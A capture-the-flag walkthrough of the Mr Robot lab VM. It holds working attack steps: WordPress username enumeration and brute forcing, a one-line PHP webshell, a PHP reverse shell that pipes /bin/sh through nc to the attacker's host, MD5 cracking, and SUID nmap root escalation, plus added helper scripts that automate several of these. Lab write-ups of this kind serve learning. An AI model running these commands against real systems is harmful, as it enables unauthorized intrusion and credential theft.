Preface
Damn. When I wanted to carry on with the webshell today, Kali froze; after a reboot it would only boot into the command line, none of the fixes online got the GUI back, and I had to roll back to a snapshot. Once the environment was set up again and I continued, I found the target machine was broken as well: for some reason both port 80 and port 443 show the phpinfo() page I wrote yesterday. I am too lazy to reset it and redo the earlier information gathering, so bear with me.
Information gathering
Host discovery
┌──(root㉿kali)-[~/桌面/webshell/Cknife]
└─ arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:68:c5:69, IPv4: 192.168.48.128
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.48.1 00:50:56:c0:00:08 VMware, Inc.
192.168.48.2 00:50:56:e1:fd:22 VMware, Inc.
192.168.48.144 00:0c:29:0a:5e:39 VMware, Inc.
192.168.48.254 00:50:56:f7:e7:0c VMware, Inc.
Target IP: 192.168.48.144
Port scan
┌──(root㉿kali)-[~/桌面/webshell/Cknife]
└─ nmap -sC -sV -p- 192.168.48.144
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-22 18:44 CST
Nmap scan report for 192.168.48.144
Host is up (0.00051s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:0A:5E:39 (VMware)
Port 22 shows as closed: the host answers, but nothing is listening for SSH there, which is a bit odd.
Ports 80 and 443 are open, with Apache serving both HTTP and HTTPS normally (the certificate is a placeholder for www.example.com).
Directory scan
┌──(root㉿kali)-[~]
└─ dirsearch -u http://192.168.48.144
Too many results to list here. The interesting paths that came out of the scan were:
http://192.168.48.144/robots.txt
http://192.168.48.144/readme
http://192.168.48.144/wp-login.php
Finding the flags
Using the information
Visiting http://192.168.48.144/robots.txt reveals the first flag file, key-1-of-3.txt.
The other file it lists, fsocity.dic, turns out on download to be a wordlist suitable for brute forcing; save it as passwd.txt for now.
Password brute forcing
http://192.168.48.144/wp-login.php is the WordPress back-end login page. Brute forcing username and password together is not practical here: the wordlist has about eighty thousand entries, so the combined search space is far too large. Instead, enumerate the username first through the lost-password page.
A tip from online: when the wordlist is that large, deduplicate it first with "sort fsocity.dic | uniq > dic.txt" (equivalently "sort -u fsocity.dic > dic.txt").
http://192.168.48.144/wp-login.php?action=lostpassword
Brute forcing with Burp yields three "usernames": elliot, Elliot and ELLIOT. WordPress logins are case-insensitive, so these are one account, elliot.
Then brute-force the login page for user elliot; the password is ER28-0652.
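The two steps above (deduplicating the wordlist, then using the lost-password form as a username oracle) as a small shell helper. This is an added example, not code from the original writeup. The WordPress error strings it matches on are an assumption for the WordPress version of that era: send one request for a known-bad user and one for a plausible user in Burp first and adjust the patterns to what the target actually returns.

```shell
#!/bin/sh
# Added example, not part of the original writeup.
# Step 1: deduplicate the wordlist (same result as `sort file | uniq`).
# Step 2: classify lost-password responses so a loop can pick out valid users.
# The WordPress message strings below are assumptions; verify them in Burp.

# dedup_wordlist <src> <dst>: writes the unique lines of src to dst and
# prints how many lines are left, so you can see how much work you saved.
dedup_wordlist() {
    src="$1"; dst="$2"
    sort -u "$src" > "$dst"
    wc -l < "$dst" | tr -d ' '
}

# classify_lostpassword: reads a response body on stdin and prints
#   invalid  -> WordPress said the account does not exist
#   valid    -> WordPress accepted the user and tried to send mail
#               (on this box the mail() call fails, which is still a "valid")
#   unknown  -> neither string seen; look at the raw response yourself
classify_lostpassword() {
    body=$(cat)
    case "$body" in
        *"Invalid username or e-mail"*)                echo invalid ;;
        *"Check your e-mail"*|*"could not be sent"*)    echo valid ;;
        *)                                             echo unknown ;;
    esac
}

# enumerate_users <base-url> <wordlist>: prints usernames the oracle accepts.
# Talks to a live target, so it is not exercised offline.
# Usage: enumerate_users http://192.168.48.144 dic.txt
enumerate_users() {
    base="$1"; list="$2"
    while IFS= read -r user; do
        [ -n "$user" ] || continue
        verdict=$(curl -s -L --data-urlencode "user_login=$user" \
                  -d "wp-submit=Get+New+Password" \
                  "$base/wp-login.php?action=lostpassword" | classify_lostpassword)
        [ "$verdict" = valid ] && echo "$user"
    done < "$list"
}
```

The point of splitting the classifier out is that the oracle is whatever difference the server leaks, not a particular string: if the target's messages differ, change only the two patterns and rerun.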
Webshell
Logging in to the back end
Looked up approaches for getting a webshell from the WordPress back end:
https://www.cnblogs.com/dubh3/p/11561400.html
Following that article's approach:
First find the plugin upload point.
phpinfo.php uploads successfully, and the file can be reached at the path built from the upload date:
http://192.168.48.144/wp-content/uploads/2023/04/phpinfo.php
OK, upload a one-line PHP webshell and request it:
http://192.168.48.144/wp-content/uploads/2023/04/shell.php
Try connecting with Cknife.
That should be caused by the target's PHP version being too new; I remember reading an article saying Cknife only works with PHP below 5.x.
Let's switch to AntSword!!!
Installation went smoothly enough.
Connected.
Found the flag2 file.
After downloading it locally, it appears we have no permission to read it.
In AntSword's terminal you can see the same thing,
but the other file in the directory is readable, so download it and have a look.
(screenshot of the contents of password.raw-md5; image not preserved)
It should be the MD5 of the robot user's password.
Damn, the MD5 lookup sites want money. As a freeloader I won't have it, so I just went and found a walkthrough online.
The password is abcdefghijklmnopqrstuvwxyz.
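Rather than paying a lookup site, a raw MD5 of a wordlist candidate is cheap to crack offline. The script below is an added example, not part of the original writeup: it reads a "user:hash" file of the kind the box uses and tries every word of a list. The hash embedded here is MD5("abcdefghijklmnopqrstuvwxyz") as given in the RFC 1321 test vectors; the second constructed line has a dummy hash so the not-found path is shown too.

```shell
#!/bin/sh
# Added example, not part of the original writeup.
# Offline cracking of a raw-md5 "user:hash" file against a wordlist.
# c3fcd3d76192e4007dfb496cca67e13b is MD5("abcdefghijklmnopqrstuvwxyz")
# from the RFC 1321 test vectors; the "nobody" line is a constructed dummy.

SAMPLE_HASHES='robot:c3fcd3d76192e4007dfb496cca67e13b
nobody:00000000000000000000000000000000'

# md5_of <string>: hex MD5 of the string with no trailing newline.
# printf, not echo: echo would append "\n" and hash the wrong bytes.
md5_of() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# crack_raw_md5 <hash> <wordlist>: prints the matching word, or returns 1.
crack_raw_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    while IFS= read -r word; do
        [ -n "$word" ] || continue
        if [ "$(md5_of "$word")" = "$target" ]; then
            echo "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# crack_file <user:hash file> <wordlist>: one "user:password" line per entry,
# or "user:<not found>" when the wordlist does not contain the password.
crack_file() {
    while IFS=: read -r user hash; do
        [ -n "$user" ] || continue
        if pw=$(crack_raw_md5 "$hash" "$2"); then
            echo "$user:$pw"
        else
            echo "$user:<not found>"
        fi
    done < "$1"
}
```

For a real wordlist of this size you would reach for a proper tool instead of a shell loop, e.g. `hashcat -m 0 --username password.raw-md5 fsocity.dic` or `john --format=raw-md5 password.raw-md5 --wordlist=fsocity.dic`; the script is here to show that nothing about a raw MD5 needs a paid service.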
Reverse shell
Write a reverse-shell script and upload it:
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.48.128 5555 >/tmp/f');?>
// Reverse shell to port 5555 on 192.168.48.128. The named pipe /tmp/f carries our typed input: nc writes what it receives into the pipe, cat feeds it to an interactive /bin/sh, and the shell's stdout and stderr go back out through nc.
After the upload succeeds, start a listener on the attacker host (adding -n to nc skips the reverse DNS lookup that produces the "inverse host lookup failed" line below), then request the webshell file:
192.168.48.144/wp-content/uploads/2023/04/Rebound_shell.php
┌──(root㉿kali)-[~]
└─ nc -lvp 5555
listening on [any] 5555 ...
192.168.48.144: inverse host lookup failed: Unknown host
connect to [192.168.48.128] from (UNKNOWN) [192.168.48.144] 47875
/bin/sh: 0: can't access tty; job control turned off
$ ls
Rebound_shell.php
shell1.php
$ su robot
su: must be run from a terminal
$
The connection comes back, but trying to switch user still gives "must be run from a terminal". Damn, doesn't a reverse shell count?
After looking it up: neither a reverse shell nor AntSword's terminal is a real interactive terminal. To run commands like su you have to upgrade to an interactive shell.
How to upgrade a bare shell to a proper interactive shell:
https://www.jianshu.com/p/e7202cb2c3dd
Run the following in the reverse shell, after which su works:
$ python -c 'import pty; pty.spawn("/bin/bash")'
┌──(root㉿kali)-[~]
└─ nc -lvp 5555
listening on [any] 5555 ...
192.168.48.144: inverse host lookup failed: Unknown host
connect to [192.168.48.128] from (UNKNOWN) [192.168.48.144] 47877
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
daemon@linux:/opt/bitnami/apps/wordpress/htdocs/wp-content/uploads/2023/04$ su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:/opt/bitnami/apps/wordpress/htdocs/wp-content/uploads/2023/04$
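The upgrade above worked because this box has a `python` binary; that is not a safe assumption elsewhere. The helper below is an added example, not part of the original writeup: it picks the first PTY-spawning command available on the target (python3, python, python2, or util-linux `script` as a fallback) and shows the rest of the upgrade sequence as comments. Tool names and the `script -qc` fallback are assumptions about what the target ships.

```shell
#!/bin/sh
# Added example, not part of the original writeup.
# Run this on the target inside the dumb reverse shell; it prints the
# command to paste to get a real TTY. Then, from the attacker side:
#   Ctrl-Z                       (background the nc session)
#   stty raw -echo; fg           (stop the local tty from eating keys)
#   export TERM=xterm            (so clear/vim/less work)
#   stty rows 50 cols 200        (use the values `stty size` prints locally)

# spawn_cmd_for <tool>: the PTY-spawning command for a known interpreter,
# or return 1 for anything we do not know how to use.
spawn_cmd_for() {
    case "$1" in
        python|python2|python3)
            printf "%s -c 'import pty; pty.spawn(\"/bin/bash\")'\n" "$1" ;;
        script)
            # -q: no banner; -c: command to run; /dev/null: discard the typescript
            echo 'script -qc /bin/bash /dev/null' ;;
        *)
            return 1 ;;
    esac
}

# pick_pty_spawner: first available tool, in order of preference.
pick_pty_spawner() {
    for tool in python3 python python2 script; do
        if command -v "$tool" >/dev/null 2>&1; then
            spawn_cmd_for "$tool"
            return 0
        fi
    done
    echo "no python or script on this host; try socat or a full pty reverse shell" >&2
    return 1
}

# has_tty: "yes" when the current shell already has a controlling terminal,
# which is exactly what `su: must be run from a terminal` is checking for.
has_tty() {
    if tty >/dev/null 2>&1; then echo yes; else echo no; fi
}
```

Calling has_tty before and after the upgrade is a quick way to confirm the spawn actually took effect; su and sudo both refuse to prompt for a password without a controlling TTY.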
OK, we are robot now. Let's go look at the second flag.
robot@linux:/home$ cd /home/robot
cd /home/robot
robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
Privilege escalation
The third flag is presumably in /root, so what remains is escalating privileges.
robot@linux:~$ uname -a
uname -a
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
robot@linux:~$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.2 LTS
Release: 14.04
Codename: trusty
The target runs Ubuntu 14.04.2 with kernel 3.13.0-55.
Use searchsploit to see whether there is a usable privilege-escalation exploit:
┌──(root㉿kali)-[~]
└─ searchsploit privilege Ubuntu 14.04.2
# "privilege" is added to the search because we only want local privilege-escalation exploits
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
Apport 2.14.1 (Ubuntu 14.04.2) - Local Privil | linux/local/36782.sh
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14. | linux_x86-64/local/42275.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Acces | linux/local/41760.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
┌──(root㉿kali)-[~]
└─ cd 桌面/MrRobot/
┌──(root㉿kali)-[~/桌面/MrRobot]
└─ searchsploit -m 36782
Exploit: Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/36782
Path: /usr/share/exploitdb/exploits/linux/local/36782.sh
Codes: CVE-2015-1318, OSVDB-120803
Verified: False
File Type: POSIX shell script, ASCII text executable
Copied to: /root/桌面/MrRobot/36782.sh
┌──(root㉿kali)-[~/桌面/MrRobot]
└─ ls
36782.sh key-2-of-3.txt MrRobot.md password.raw-md5
...
Only to find there is no way to create files on or download files to the target... now what?
Check sudo rights:
robot@linux:~$ sudo -l
sudo -l
[sudo] password for robot: abcdefghijklmnopqrstuvwxyz
Sorry, user robot may not run sudo on linux.
After some searching I found a new technique:
Privilege escalation through SUID executables.
For how to use it, see https://blog.csdn.net/qq_43632414/article/details/120592028 (it lists nmap, find, vim, bash, more, less, nano and cp as binaries that can be abused for escalation when they carry the SUID bit).
Use find / -user root -perm -4000 -print 2>/dev/null to list root-owned SUID binaries (-perm -4000 matches the setuid bit; -user root keeps only the ones that would give root). nmap shows up in the list.
robot@linux:~$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
nmap is an exploitable candidate; check whether the version qualifies.
robot@linux:~$ nmap -v
nmap -v
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2023-04-22 17:37 UTC
No target machines/networks specified!
QUITTING!
3.81 falls within 2.02 to 5.21, the range of nmap versions that still have interactive mode. OK, start the escalation:
Enter interactive mode with nmap --interactive,
then run !sh,
which drops into a shell that inherits nmap's SUID root privileges.
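The SUID check above is worth scripting, because the interesting entry is easy to miss in a long find listing. The script below is an added example, not part of the original writeup: it filters SUID paths against the binaries the referenced article names, and checks an nmap banner against the 2.02 to 5.21 range. The embedded list is the find output captured on this box, included so the script runs offline; on a live target pipe the real find into suid_triage instead.

```shell
#!/bin/sh
# Added example, not part of the original writeup.
# SUID triage: flag known shell-escape binaries, then confirm nmap's version.
# SAMPLE_SUID is the find output captured on the box, embedded for offline use.

SAMPLE_SUID='/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown'

# suid_triage: reads SUID paths on stdin, prints those whose basename is one
# of the binaries the referenced article lists as abusable when SUID.
# Anything under /usr/local deserves a second look anyway: distro packages
# do not install nmap with the setuid bit, so someone put it there by hand.
suid_triage() {
    while IFS= read -r path; do
        case "$(basename "$path")" in
            nmap|find|vim|bash|more|less|nano|cp) echo "$path" ;;
        esac
    done
}

# nmap_version_from_banner <banner line>: first "N.NN" token, e.g. 3.81 from
# "Starting nmap 3.81 ( ... )" or "Starting nmap V. 3.81 ( ... )".
nmap_version_from_banner() {
    printf '%s\n' "$1" | grep -o '[0-9][0-9]*\.[0-9][0-9]*' | head -n 1
}

# nmap_has_interactive <version>: succeeds when --interactive exists,
# i.e. 2.02 <= version <= 5.21. Compared as major*100+minor so that
# 3.81 -> 381 and 5.21 -> 521; leading zeros and suffixes like BETA1 are dropped.
nmap_has_interactive() {
    major=${1%%.*}
    minor=${1#*.}
    minor=$(printf '%s' "$minor" | sed 's/[^0-9].*//; s/^0*//')
    v=$((major * 100 + ${minor:-0}))
    [ "$v" -ge 202 ] && [ "$v" -le 521 ]
}

# Usage on a live host:
#   find / -user root -perm -4000 -print 2>/dev/null | suid_triage
#   nmap_has_interactive "$(nmap_version_from_banner "$(nmap -v 2>&1 | head -n 1)")" && echo "try nmap --interactive, then !sh"
```

Note that GTFOBins-style lists change with time; the basename match here is only the eight names from the cited article, which is enough for this box but should be extended for anything else.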
robot@linux:~$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# ls
ls
key-2-of-3.txt password.raw-md5
# touch test.txt
touch test.txt
# ls
ls
key-2-of-3.txt password.raw-md5 test.txt
Privilege escalation succeeded: the prompt has changed to #, the root shell prompt (id would confirm uid=0).
Next, find flag 3:
# cd /root
cd /root
# ls
ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Summary
How to get a shell from the WordPress back end
After getting a shell, how to upgrade it to an interactive one
A new privilege-escalation idea: abusing files with the SUID bit